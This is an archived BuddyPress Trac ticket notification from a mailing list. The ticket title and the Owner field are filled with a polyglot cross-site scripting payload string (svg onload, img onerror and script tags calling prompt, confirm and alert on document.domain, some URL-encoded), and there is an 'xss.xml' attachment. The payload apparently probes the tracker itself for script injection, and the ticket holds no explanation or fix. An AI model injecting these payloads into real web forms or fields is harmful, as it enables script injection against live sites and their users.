[buddypress-trac] [BuddyPress Trac] #7937: --><svg><x><script AND /*/*/*>prompt`xssposed`</x> "><img sRc=l oNerrOr=prompt(document.domain) x> "'--!><Script /K/>confirm(document.domain)</Script /K/> '"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt> a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)> %3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E <svG onLoad=prompt(9)> "><svg/onload=confirm(1)>;
buddypress-trac
noreply at wordpress.org
Wed Jul 25 08:25:32 UTC 2018
Reporter: safwa
Owner: --><svg><x><script AND /*/*/*>prompt`xssposed`</x> "><img sRc=l oNerrOr=prompt(document.domain) x> "'--!><Script /K/>confirm(document.domain)</Script /K/> '"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt> a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)> %3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E <svG onLoad=prompt(9)> "><svg/onload=confirm(1)>;
Type: defect (bug)
Status: assigned
Priority: normal
Milestone: Awaiting Review
Component: Core
Version: 3.0.0
Severity: normal
Resolution:
Keywords: has-patch
Changes (by safwa):
* Attachment "xss.xml" added.
--
Ticket URL: <https://buddypress.trac.wordpress.org/ticket/7937>
BuddyPress Trac <http://buddypress.org/>